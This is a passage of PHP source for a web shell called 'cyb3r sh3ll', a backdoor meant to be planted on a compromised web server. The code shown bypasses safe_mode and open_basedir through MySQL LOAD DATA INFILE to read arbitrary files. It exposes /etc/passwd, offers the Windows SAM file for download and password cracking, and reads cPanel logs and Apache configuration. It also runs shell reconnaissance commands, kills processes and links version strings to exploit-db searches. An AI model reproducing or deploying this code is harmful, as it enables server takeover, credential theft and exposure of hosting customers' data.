  1654. if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  1655. if (!empty($sql_act))
  1656. {
  1657. echo "<hr size=\"1\" noshade>";
  1658. if ($sql_act == "newdb")
  1659. {
  1660. echo "<b>";
  1661. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1662. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1663. }
  1664. if ($sql_act == "serverstatus")
  1665. {
  1666. $result = mysql_query("SHOW STATUS", $sql_sock);
  1667. echo "<center><b>Server-status variables:</b><br><br>";
  1668. echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1669. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1670. echo "</table></center>";
  1671. mysql_free_result($result);
  1672. }
  1673. if ($sql_act == "servervars")
  1674. {
  1675. $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1676. echo "<center><b>Server variables:</b><br><br>";
  1677. echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1678. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1679. echo "</table>";
  1680. mysql_free_result($result);
  1681. }
  1682. if ($sql_act == "processes")
  1683. {
  1684. if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  1685. $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1686. echo "<center><b>Processes:</b><br><br>";
  1687. echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#15354c borderColorLight=#15354c border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1688. while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1689. echo "</table>";
  1690. mysql_free_result($result);
  1691. }
  1692. if ($sql_act == "getfile")
  1693. {
  1694. $tmpdb = $sql_login."_tmpdb";
  1695. $select = mysql_select_db($tmpdb);
  1696. if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1697. if ($select)
  1698. {
  1699. $created = FALSE;
  1700. mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1701. mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1702. $result = mysql_query("SELECT * FROM tmp_file;");
  1703. if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  1704. else
  1705. {
  1706. for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1707. $f = "";
  1708. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  1709. if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  1710. else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  1711. mysql_free_result($result);
  1712. mysql_query("DROP TABLE tmp_file;");
  1713. }
  1714. }
  1715. mysql_drop_db($tmpdb); //comment it if you want to leave database
  1716. }
  1717. }
  1718. }
  1719. }
  1720. echo "</td></tr></table>";
  1721. if ($sql_sock)
  1722. {
  1723. $affected = @mysql_affected_rows($sql_sock);
  1724. if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  1725. echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
  1726. }
  1727. echo "</table>";
  1728. }
  1729. if ($act == "mkdir")
  1730. {
  1731. if ($mkdir != $d)
  1732. {
  1733. if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
  1734. elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
  1735. echo "<br><br>";
  1736. }
  1737. $act = $dspact = "ls";
  1738. }
  1739. if ($act == "d")
  1740. {
  1741. if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
  1742. else
  1743. {
  1744. echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  1745. if (!$win)
  1746. {
  1747. echo "<tr><td><b>Owner/Group</b></td><td> ";
  1748. $ow = posix_getpwuid(fileowner($d));
  1749. $gr = posix_getgrgid(filegroup($d));
  1750. $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  1751. }
  1752. echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  1753. }
  1754. }
  1755. if ($act == "security")
  1756. {
  1757. echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
  1758. if (!$win)
  1759. {
  1760. if ($nixpasswd)
  1761. {
  1762. if ($nixpasswd == 1) {$nixpasswd = 0;}
  1763. echo "<b>*nix /etc/passwd:</b><br>";
  1764. if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  1765. if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  1766. echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
  1767. $i = $nixpwd_s;
  1768. while ($i < $nixpwd_e)
  1769. {
  1770. $uid = posix_getpwuid($i);
  1771. if ($uid)
  1772. {
  1773. $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  1774. echo join(":",$uid)."<br>";
  1775. }
  1776. $i++;
  1777. }
  1778. }
  1779. else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
  1780. }
  1781. else
  1782. {
  1783. $v = $_SERVER["WINDIR"]."\repair\sam";
  1784. if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
  1785. else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
  1786. }
  1787. if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  1788. if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
  1789. if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1790. if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1791. if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
  1792. if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
  1793. if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
  1794. function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
  1795. displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
  1796. displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
  1797. displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
  1798. displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
  1799. displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
  1800. displaysecinfo("RAM",myshellexec("free -m"));
  1801. displaysecinfo("HDD space",myshellexec("df -h"));
  1802. displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
  1803. displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
  1804. displaysecinfo("Is cURL installed?",myshellexec("which curl"));
  1805. displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
  1806. displaysecinfo("Is links installed?",myshellexec("which links"));
  1807. displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
  1808. displaysecinfo("Is GET installed?",myshellexec("which GET"));
  1809. displaysecinfo("Is perl installed?",myshellexec("which perl"));
  1810. displaysecinfo("Where is apache",myshellexec("whereis apache"));
  1811. displaysecinfo("Where is perl?",myshellexec("whereis perl"));
  1812. displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
  1813. displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
  1814. displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
  1815. displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
  1816. }
  1817. if ($act == "mkfile")
  1818. {
  1819. if ($mkfile != $d)
  1820. {
  1821. if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  1822. elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  1823. else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  1824. }
  1825. else {$act = $dspact = "ls";}
  1826. }
  1827. if ($act == "encoder")
  1828. {
  1829. echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
  1830. foreach(array("md5","crypt","sha1","crc32") as $v)
  1831. {
  1832. echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
  1833. }
  1834. echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
  1835. <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
  1836. <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
  1837. echo "<center>base64_decode - ";
  1838. if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
  1839. else
  1840. {
  1841. $debase64 = base64_decode($encoder_input);
  1842. $debase64 = str_replace("\0","[0]",$debase64);
  1843. $a = explode("\r\n",$debase64);
  1844. $rows = count($a);
  1845. $debase64 = htmlspecialchars($debase64);
  1846. if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
  1847. else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  1848. echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
  1849. }
  1850. echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  1851. $c = strlen($encoder_input);
  1852. for($i=0;$i<$c;$i++)
  1853. {
  1854. $hex = dechex(ord($encoder_input[$i]));
  1855. if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  1856. elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  1857. }
  1858. echo "\" readonly><br></center></form>";
  1859. }
  1860. if ($act == "selfremove")
  1861. {
  1862. if (($submit == $rndcode) and ($submit != ""))
  1863. {
  1864. if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using cyb3r sh3ll v.".$shver."!"; cyb3rexit(); }
  1865. else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  1866. }
  1867. else
  1868. {
  1869. if (!empty($rndcode)) {echo "<b>Error: Incorrect Confimation!</b>";}
  1870. $rnd = rand(0,9).rand(0,9).rand(0,9);
  1871. echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
  1872. }
  1873. }
  1874. if ($act == "serverinfo")
  1875. {
  1876. global $windows,$disablefunctions,$safemode;
  1877. $cwd= getcwd();
  1878. $mil="<a target=\"_blank\" href=\"http://www.exploit-db.com/search/?action=search&filter_exploit_text=";
  1879. $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
  1880. if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
  1881. $osver=$tsize=$fsize='';
  1882. if ($windows){
  1883. $osver = " (".shelL("ver").")";
  1884. $sysroot = shelL("echo %systemroot%");
  1885. if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
  1886. if (empty($sysroot)) $sysroot = getenv("windir");
  1887. if (empty($sysroot)) $sysroot = "Not Found";
  1888. if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
  1889. for ($i=66;$i<=90;$i++){
  1890. $drive= chr($i).':\\';
  1891. if (is_dir($drive)){
  1892. $fsize+=@disk_free_space($drive);
  1893. $tsize+=@disk_total_space($drive);
  1894. }
  1895. }
  1896. }else{
  1897. $fsize=disk_free_space('/');
  1898. $tsize=disk_total_space('/');
  1899. }
  1900. $disksize="Used Space: ". showsizE($tsize-$fsize) . " Free Space: ". showsizE($fsize) . " Total Space: ". showsizE($tsize);
  1901. if (empty($CPU)) $CPU = "Unknown";
  1902. $os = php_unamE();
  1903. $osn=php_unamE('s');
  1904. if(!$windows){
  1905. $ker = php_unamE('r');
  1906. $o=($osn=="Linux")?"Linux+Kernel":$osn;
  1907. $os = str_replace($osn,"${mil}$o\"><font color='yellow'>$osn</font></a>",$os);
  1908. $os = str_replace($ker,"${mil}Linux+Kernel\"><font color='yellow'>$ker</font></a>",$os);
  1909. $inpa=':';
  1910. }else{
  1911. $sam = $sysroot."\\system32\\config\\SAM";
  1912. $inpa=';';
  1913. $os = str_replace($osn,"${mil}MS+Windows\"><font color='yellow'>$osn</font></a>",$os);
  1914. }
  1915. $software=str_replace("Apache","${mil}Apache\"><font color='#66ffff'>Apache</font></a>",$_SERVER['SERVER_SOFTWARE']);
  1916. echo "
  1917. <table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\" >
  1918. <tr><td><b>Server information:</b></td></tr>
  1919. <tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td>
  1920. <td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"];
  1921. if (!empty($_SERVER["SERVER_ADDR"])){
  1922. echo "(". $_SERVER["SERVER_ADDR"] .")";}
  1923. echo "
  1924. </td></tr>
  1925. <tr><td width=\"25%\" >Operation System:</td> <td >$os$osver</td></tr>
  1926. <tr><td width=\"25%\" bgcolor=\"#666666\">Web server Application:</td> <td bgcolor=\"#666666\">$software</td></tr>
  1927. <tr><td width=\"25%\" >CPU:</td> <td >$CPU</td></tr>
  1928. <td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr>
  1929. <tr><td width=\"25%\" >User domain:</td><td >";
  1930. if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];
  1931. else echo "Unknown";
  1932. echo "
  1933. </td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><a href=\"".$surl."act=processes\" ><font color=#66ffff>User Name </font>:</a></td>
  1934. <td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();
  1935. else echo "Unknown"; echo "</td></tr>";
  1936. if ($windows){
  1937. echo "
  1938. <tr><td width=\"25%\" >Windows directory:</td><td ><a href=\"".$surl."act=ls&d=$sysroot"."\"><font color=yellow>$sysroot</font></a></td></tr><tr>
  1939. <td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";
  1940. if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">
  1941. <font color=#66ffff>Readable</font></a>"; else echo "Not readable";echo "</td></tr>";
  1942. }
  1943. else
  1944. {
  1945. echo "<tr><td width=\"25%\" >Passwd file:</td><td >";
  1946. if (is_readable('/etc/passwd')) echo "
  1947. <a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
  1948. if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\"><font color=#66ffff>Readable</font></a>"; else echo "Not readable";}else echo "Not found";
  1949. echo "</td></tr>";
  1950. }
  1951. $uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
  1952. echo "
  1953. <tr><td width=\"25%\" >${mil}PHP\"><font color=yellow>PHP</font></a> version:</td>
  1954. <td ><a href=\"?=".php_logo_guid()."\" target=\"_blank\"><font color=yellow>".PHP_VERSION."</font></a>
  1955. (<a href=\"".$surl."act=phpinfo\"><font color=yellow>more...</font></a>)</td></tr>
  1956. <tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td>
  1957. <td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\"><font color=#66ffff>".zend_version()."</font></a>";
  1958. else echo "Not Found";echo "</td>
  1959. <tr><td width=\"25%\" >Include path:</td>
  1960. <td >".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td>
  1961. <tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td>
  1962. <td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";
  1963. echo "</td><tr><td width=\"25%\" >Disabled functions:</td><td >";
  1964. if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr>
  1965. <tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$sfmode</font></td></tr>
  1966. <tr><td width=\"25%\" >Open base dir:</td><td >$basedir</td></tr>
  1967. <tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td>
  1968. <td bgcolor=\"#666666\">";$sq="";
  1969. if(function_exists('mysql_connect')) $sq= "${mil}MySQL\"><font color=#66ffff>MySQL</font></a> ";
  1970. if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\"><font color=#66ffff>MSSQL</font></a> ";
  1971. if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\"><font color=#66ffff>Oracle</font></a> ";
  1972. if(function_exists('sqlite_open')) $sq.= " SQLite ";
  1973. if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\"><font color=#66ffff>PostgreSQL</font></a> ";
  1974. if(function_exists('msql_connect')) $sq.= " mSQL ";
  1975. if(function_exists('mysqli_connect'))$sq.= " MySQLi ";
  1976. if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";
  1977. if ($sq=="") $sq= "Nothing";
  1978. echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" >cURL support:</td><td >Enabled ";
  1979. if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "</table>";
  1980. }
  1981. if ($act == "clientinfo")
  1982. {
  1983. echo "<table><tr><td><b>User information</b>:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">".$_SERVER['REMOTE_ADDR']."</td></tr><tr><td width=\"25%\" >Agent:</td><td >".getenv('HTTP_USER_AGENT')."</td></tr></table>";
  1984. }
  1985. if ($act == "processes")
  1986. {
  1987. echo "<b>Processes:</b><br>";
  1988. if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
  1989. else {$handler = "tasklist";}
  1990. $ret = myshellexec($handler);
  1991. if (!$ret) {echo "Can't execute \"".$handler."\"!";}
  1992. else
  1993. {
  1994. if (empty($processes_sort)) {$processes_sort = $sort_default;}
  1995. $parsesort = parsesort($processes_sort);
  1996. if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  1997. $k = $parsesort[0];
  1998. if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  1999. else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2000. $ret = htmlspecialchars($ret);
  2001. if (!$win)
  2002. {
  2003. if ($pid)
  2004. {
  2005. if (is_null($sig)) {$sig = 9;}
  2006. echo "Sending signal ".$sig." to #".$pid."... ";
  2007. if (posix_kill($pid,$sig)) {echo "OK.";}
  2008. else {echo "ERROR.";}
  2009. }
  2010. while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
  2011. $stack = explode("\n",$ret);
  2012. $head = explode(" ",$stack[0]);
  2013. unset($stack[0]);
  2014. for($i=0;$i<count($head);$i++)
  2015. {
  2016. if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
  2017. }
  2018. $prcs = array();
  2019. foreach ($stack as $line)
  2020. {
  2021. if (!empty($line))
  2022. {
  2023. echo "<tr>";
  2024. $line = explode(" ",$line);
  2025. $line[10] = join(" ",array_slice($line,10));
  2026. $line = array_slice($line,0,11);
  2027. if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
  2028. $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  2029. $prcs[] = $line;
  2030. echo "</tr>";
  2031. }
  2032. }
  2033. }
  2034. else
  2035. {
  2036. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2037. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2038. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2039. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2040. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2041. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2042. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2043. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2044. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2045. while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  2046. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2047. $ret = convert_cyr_string($ret,"d","w");
  2048. $stack = explode("\n",$ret);
  2049. unset($stack[0],$stack[2]);
  2050. $stack = array_values($stack);
  2051. $head = explode("",$stack[0]);
  2052. $head[1] = explode(" ",$head[1]);
  2053. $head[1] = $head[1][0];
  2054. $stack = array_slice($stack,1);
  2055. unset($head[2]);
  2056. $head = array_values($head);
  2057. if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2058. else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2059. if ($k > count($head)) {$k = count($head)-1;}
  2060. for($i=0;$i<count($head);$i++)
  2061. {
  2062. if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
  2063. }
  2064. $prcs = array();
  2065. foreach ($stack as $line)
  2066. {
  2067. if (!empty($line))
  2068. {
  2069. echo "<tr>";
  2070. $line = explode("",$line);
  2071. $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  2072. $line[2] = intval(str_replace(" ","",$line[2]))*1024;
  2073. $prcs[] = $line;
  2074. echo "</tr>";
  2075. }
  2076. }
  2077. }
  2078. $head[$k] = "<b>".$head[$k]."</b>".$y;
  2079. $v = $processes_sort[0];
  2080. usort($prcs,"tabsort");
  2081. if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2082. $tab = array();
  2083. $tab[] = $head;
  2084. $tab = array_merge($tab,$prcs);
  2085. echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  2086. foreach($tab as $i=>$k)
  2087. {
  2088. echo "<tr>";
  2089. foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
  2090. echo "</tr>";
  2091. }
  2092. echo "</table>";
  2093. }
  2094. }
  2095. if ($act == "ls")
  2096. {
  2097. if (count($ls_arr) > 0) {$list = $ls_arr;}
  2098. else
  2099. {
  2100. $list = array();
  2101. if ($h = @opendir($d))
  2102. {
